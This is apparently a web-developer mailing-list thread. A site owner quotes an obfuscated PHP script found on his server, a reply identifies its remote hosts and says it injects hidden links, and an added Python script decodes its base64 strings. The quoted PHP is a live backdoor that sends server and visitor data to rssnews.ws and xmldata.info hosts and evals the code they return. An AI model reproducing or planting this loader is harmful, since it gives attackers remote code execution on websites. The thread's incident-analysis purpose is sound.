I decoded some of the strings in the script and found
http://7.rssnews.ws
Googling for 7.rssnews.ws yields this discussion
http://forums.oscommerce.com/lofiversion/index.php?t301350.html
It's an OsCommerce forum but I don't think this is necessarily an
OsCommerce problem. You apparently have a writable directory somewhere.
The code is used to add hidden links to pages.
Googling for rssnews.ws provides more links.
Timestamps and server logs will tell you more about what happened. If
you haven't done so already, you should notify your host.
Sheila
steve miller wrote:
Hello...
I just found a bad script on my website :(
Can anyone here tell me what they might have stolen?
Here is the script:
error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ?
$_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?
$_SERVER["SERVER_NAME"] :
$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ?
$_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])
? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])
? $_SERVER["QUERY_STRING"] :
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ?
$_SERVER["HTTP_REFERER"] :
$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ?
$_SERVER["HTTP_USER_AGENT"] :
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ?
$_SERVER["REMOTE_ADDR"] :
$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ?
$_SERVER["SCRIPT_FILENAME"] :
$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?
$_SERVER["HTTP_ACCEPT_LANGUAGE"] :
$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);
if
((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else if
(include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));else
if
($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);};
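Added example, not part of the original thread: a small Python triage script that does offline what the reply describes, decoding the base64 literals in the quoted script and listing the remote hosts and the PHP calls that fetch or execute remote content. SAMPLE is an abbreviated excerpt of the script above, and the function names are this example's own.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Abbreviated excerpt of the script quoted above. The base64 literals are
# copied from the post; "..." marks code left out here.
SAMPLE = r'''
error_reporting(0); ...
if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}
else if (include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));
else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str); ... eval($str);}
'''

CALL = r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)'
# Calls joined by PHP's "." operator build a single string, so decode them together.
CHAIN = re.compile(r'(?:' + CALL + r'\s*\.?\s*)+')
SINKS = ("include", "require", "eval", "file_get_contents", "curl_init")

def decode_literals(php_source):
    """Decode every base64_decode("...") literal, joining chained calls."""
    decoded = []
    for chain in CHAIN.finditer(php_source):
        try:
            parts = [base64.b64decode(lit, validate=True).decode("utf-8", "replace")
                     for lit in re.findall(CALL, chain.group(0))]
        except binascii.Error:
            continue  # not valid base64: leave for manual review
        decoded.append("".join(parts))
    return decoded

def remote_hosts(decoded):
    """Hostnames of any http(s) URLs among the decoded strings."""
    return sorted({urlparse(s).hostname for s in decoded
                   if s.lower().startswith(("http://", "https://")) and urlparse(s).hostname})

def sinks_present(php_source):
    """PHP calls in the source that load or execute remote content."""
    return sorted(s for s in SINKS if re.search(r'\b' + s + r'\s*\(', php_source))

if __name__ == "__main__":
    strings = decode_literals(SAMPLE)
    print("decoded:", strings)
    print("hosts:  ", remote_hosts(strings))
    print("sinks:  ", sinks_present(SAMPLE))
```

The include of an http:// URL only succeeds when PHP's allow_url_include setting is on; the script's else branches fall back to file_get_contents and curl followed by eval, so all four calls are worth searching for in other files on the site.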
____ The WDVL Discussion List from WDVL.COM ____